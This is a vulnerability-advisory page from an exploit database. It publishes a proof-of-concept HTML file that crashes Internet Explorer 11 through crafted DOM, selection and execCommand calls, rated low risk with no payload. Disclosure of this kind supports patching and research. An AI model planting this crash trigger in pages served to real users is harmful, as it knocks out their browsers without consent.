IE11 EdUtil::GetCommonAncestorElement Remote Crash

2016.01.01
Credit: Marcin Ressel
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!doctype html> <html> <head> <meta http-equiv='Cache-Control' content='no-cache'/> <title>EdUtil::GetCommonAncestorElement Remote Crash</title> <script> /* * Title : IE11 EdUtil::GetCommonAncestorElement Remote Crash * Date : 31.12.2015 * Author : Marcin Ressel (https://twitter.com/m_ressel) * Vendor Hompage : www.microsoft.com * Software Link : n/a * Version : 11.0.9600.18124 * Tested on: Windows 7 x64 */ var trg,src,arg; var range,select,observer; function testcase() { document.body.innerHTML ='<table><colgroup></colgroup><table><tbody><table><table></table><col></col></table></tbody></table></table><select><option>0]. option</option><option>1]. option</option></select><ul type="circle"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>'; var all = document.getElementsByTagName("*"); trg = all[9]; src = all[2]; arg = all[12]; select = document.getSelection(); observer = new MutationObserver(new Function("","range = select.getRangeAt(258);")); select.selectAllChildren(document); document.execCommand("selectAll",false,'<ul type="square"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li><li>4]. li</li><li>5]. li</li><li>6]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>'); } </script> </head> <body onload='testcase();'> </body> </html>

References:

https://twitter.com/m_ressel


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top